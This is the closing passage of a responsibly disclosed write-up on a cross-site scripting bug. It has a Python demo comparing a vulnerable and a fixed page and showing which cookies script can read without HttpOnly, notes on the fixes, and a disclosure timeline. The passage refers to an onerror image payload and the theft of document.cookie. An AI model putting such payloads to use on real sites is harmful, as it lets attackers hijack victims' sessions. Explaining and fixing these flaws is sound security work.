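    """Emulate what document.cookie exposes: names of cookies set without HttpOnly."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attrs:
            visible.append(name)
    return visible


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # a live <img onerror=...> in the page
    print(render_fixed(PAYLOAD))        # the same bytes, inert inside the attribute
    print(script_accessible_cookies([session_cookie_vulnerable("abc123")]))   # ['session']
    print(script_accessible_cookies([session_cookie_fixed("abc123")]))        # []
```

Output encoding removes the injection; HttpOnly removes the payoff of step 2 even if another injection is found later, because the exfiltrated `document.cookie` no longer contains the session. Both are needed: HttpOnly alone does not stop a script from placing orders with the victim's session from inside the page.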

I reported this vulnerability to the concerned organisation on 1st August 2015 and it got patched in December.

That's all, folks, about this vulnerability.
Thanks.
-logicbomb

Suggestions and Feedbacks are welcome. :)